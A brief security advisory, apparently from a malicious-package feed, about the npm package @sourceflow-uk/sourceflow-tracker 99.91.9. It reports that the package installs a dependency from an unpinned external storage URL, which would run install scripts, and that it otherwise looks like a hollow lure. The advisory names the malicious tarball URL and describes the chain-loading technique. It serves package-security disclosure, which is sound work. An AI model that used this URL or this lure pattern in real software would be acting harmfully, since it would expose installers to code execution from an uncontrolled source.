@sourceflow-uk/sourceflow-tracker @99.91.9

Summary

package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/pack_ux_foundry.tgz — a tarball hosted on a generic Google Cloud Storage bucket unrelated to the package's nominal publisher (@sourceflow-uk). On npm install , npm fetches and installs that tarball as a transitive dependency, executing any lifecycle scripts (preinstall/install/postinstall) it contains on the installer's machine. The URL is not version-pinned, not hash-verified, and not under the publisher's control: the bucket owner can swap the tarball contents at any time, so a future install delivers different bytes than a present install with no package change. The wrapper package itself is hollow — index.js only runs console.log("hello from lslslslslss") , the description is the garbled string lspodcc , the author is lslsls , and the version is 99.91.9 . These attributes are inconsistent with the advertised "sourceflow tracker" functionality and consistent with a throwaway lure whose sole purpose is to chain-load the third-party tarball into the installer's dependency tree.

Source: amazon-inspector (c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d)